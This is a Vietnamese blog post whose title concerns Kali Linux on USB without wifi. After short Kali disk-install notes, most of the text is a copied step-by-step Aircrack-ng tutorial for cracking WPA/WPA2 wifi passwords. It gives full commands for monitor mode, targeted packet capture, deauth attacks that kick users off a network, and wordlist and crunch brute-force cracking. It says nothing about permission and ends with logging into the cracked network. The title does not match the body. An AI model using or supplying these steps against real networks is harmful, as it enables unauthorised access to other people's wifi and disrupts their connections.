Chạy kali linux trên usb không bật dược wifi

Việc cài đặt trên SSD hay HDD cũng tương tự giống với khi các bác cài trên VM chỉ khác chỗ configure Partition disks.
Bước 1 tạo 1 cái usb kalilinux bootable [Mình hay sài rufus : //rufus.ie/en_IE.html]
Các Bác có thể làm theo hướng dẫn:

Cắm usb và ổ cứng các bác muốn cài kali vào
Boot vào usb bootable vừa tạo.
Thao tác cài đặt như cài trên Vm.
Cho đến phần partition disk các Bác làm như hướng dẫn dưới : [ từ 5p48 ]

Lưu ý chọn Đúng ổ cứng các Bác muốn cài kali nha....
Sau khi chia Partition disk 3 phần gồm:
> primary /boot
>logical /swap
>logical /

Cách chọn Swap space:

Chỉnh sửa lần cuối: 02/05/2020

Tài liệu đầy đủ:

Sử dụng Aircrack-ng để crack mật khẩu Wifi [WPA/WPA2]
Bước 1: Mở Terminal để thực hiện các câu lệnh [tương tự Command Prompt
trong Windows]
• Bước 2: Kiểm tra tên card Wireless đang sử dụng bằng lệnh iwconfig, thông
thường là card wlan0. Nếu card wireless chưa được bật [không thể kết nối wifi]
thì có thể bật bằng lệnh ifconfig wlan0 up
• Bước 3: Chuyển card mạng Wifi sang chế độ monitor [chế độ theo dõi toàn bộ
các tín hiệu trong mạng] bằng airmon-ng.
Kiểm tra tên card Wifi với lệnh iwconfig hay airmon-ng, thông thường là wlan0.
Chuyển card wlan0 sang chế độ monitor bằng công cụ airmon với lệnh:
airmon-ng start wlan0
Lúc này, kiểm tra bằng ifconfig ta sẽ thấy có card wlan0mon
• Bước 4: Sử dụng airodump để theo dõi hoạt động các mạng wifi hiện tại qua
card wlan0mon [card wlan0 ở chế độ monitor]
airodump-ng wlan0mon
• Bước 5: Xác định mạng wifi mục tiêu và sử dụng airodump để bắt gói tin và chỉ
theo dõi duy nhất mạng mục tiêu đó:
airodump-ng -c [channel] -w [tập tin] –bssid [BSSID của mạng] wlan0mon
Ví dụ: airodump-ng -c 9 -w wifi-sniff –bssid C4:6E:1F:F6:34:B8 wlan0mon
Trong đó:
+ Quan sát trường CH để xác định Channel của điểm phát sóng
+ -w [tập tin]: xác định đường dẫn để lưu tập tin bắt được [định dạng .cap]
+ bssid: Xem trường BSSID [địa chỉ MAC của access point]
• Bước 6: Thu thập gói tin bắt tay WPA handshake [bắt tay 4 bước] trong quá trình
đăng nhập để dựa vào đó dò tìm mật khẩu.
Có 2 cách:
+ Chờ người dùng nào đó đăng nhập vào Wifi đang theo dõi.
+ Sử dụng aireplay để tạo tín hiệu deauth [kích các người dùng đang sử dụng mạng
thoát ra và đăng nhập lại liên tục. Cú pháp:
aireplay-ng –deauth [số lệnh deauth] -a [BSSID của mạng] wlan0mon
Ví dụ: aireplay-ng –deauth 5 -a C4:6E:1F:2D:D6:B8 wlan0mon [có thể thay –deauth thành
-0, khi muốn gửi không giới hạn lệnh deauth có thể đặt thông số là 0]
• Bước 7: Thực hiện chờ hoặc dùng aireplay như bước 6 đến khi nhận được gói
tin WPA handshake của mạng mục tiêu tương ứng, ta dừng quá trình bắt gói tin
[Ctrl+C] và tiến hành dò tìm mật khẩu dựa vào file .cap đã bắt được.
Có thể sử dụng phương pháp dò tìm theo Wordlist hay thực hiện Brute-force để dò
tìm mật khẩu.
– Phương pháp dùng Wordlist [danh sách các từ có sẵn]
Trong Kali cung cấp sẵn một số Wordlist thông dụng tại thư mục /usr/share/wordlist. Nổi
bật là wordlist rockyou.txt với thư viện khoảng 10 triệu mật khẩu thông dụng. Ngoài ra, có
thể dùng Crunch để tự tạo Wordlist tùy ý.
Nếu sử dụng Wordlist rockyou.txt có sẵn, ta thực hiện các lệnh sau:
cp /usr/share/wordlists/rockyou.txt.gz /root/Desktop  Copy file nén chứa
rockyou.txt ra Desktop để thuận tiện sử dụng
gzip –d /root/Desktop/rockyou.txt.gz  Giải nén file rockyou.txt.gz
Sau khi đã có file rockyou.txt đã giải nén, sử dụng lệnh sau để dò tìm password:
aircrack-ng -w [đường dẫn file Wordlist] [đường dẫn file .cap đã thiết lập ở bước 5]
Ví dụ: aircrack-ng –w /root/Desktop/rockyou.txt wifi-sniff-01.cap
– Phương pháp kết hợp tool Crunch để brute-force [dò tìm vét cạn] không cần
dùng Wordlist có sẵn
Cú pháp để sử dụng Crunch:
crunch [min] [max] [charset] -t [pattern] -o [path file] với:
 [min]: số kí tự tối thiểu
 [max]: số kí tự tối đa
 [charset]: danh sách kí tự có trong mật khẩu
 [pattern]: mẫu mật khẩu & các ký tự đã biết, ký tự chưa biết ký hiệu %
 [path file]: đừng dẫn file Wordlist được tạo
Thực hiện lệnh với cú pháp như sau:
crunch [min] [max] [danh sách các ký tự có có trong chuỗi] –t [mẫu định dạng mật
khẩu] | aircrack-ng -w- [tập tin đã capture.cap] –bssid [địa chỉ MAC của mục tiêu]
Ví dụ: Dự đoán mật khẩu có 10 ký tự là 1 số điện thoại có đầu số 091, mật khẩu gồm
các số từ 0-9 có thể dò tìm vét cạn tất cả các dãy 091xxxxxxx như sau:
crunch 10 10 0123456789 –t 091%%%%%%% | aircrack-ng –w- wifi-sniff.cap –bssid
C4:6E:1F:2D:D6:B8
Bước 8: Sau khi đã tìm được mật khẩu, tắt chế độ monitor của card wlan0 để có
thể sử dụng lại Wifi bằng lệnh
airmon-ng stop wlan0mon
Dùng mật khẩu vừa dò tim để truy cập thử Wifi

Nguồn://ftlinuxcourse.com/

Xem thêm Bài Viết:

  • Trải nghiệm mới hay ho với hướng dẫn cài Mac Os trên vmware
  • Bật mí cách cài đặt ssl miễn phí lên Let’s Encrypt
  • Tuyệt chiêu tạo usb boot kali linux đơn giản dành cho bạn
  • Hướng dẫn chi tiết từ A – Z các bước cài đặt Python trên Windows 10
  • Bật mí quy trình cài đặt Kali Linux trên Vmware đúng chuẩn và chi tiết

Bài Viết Liên Quan

Chủ Đề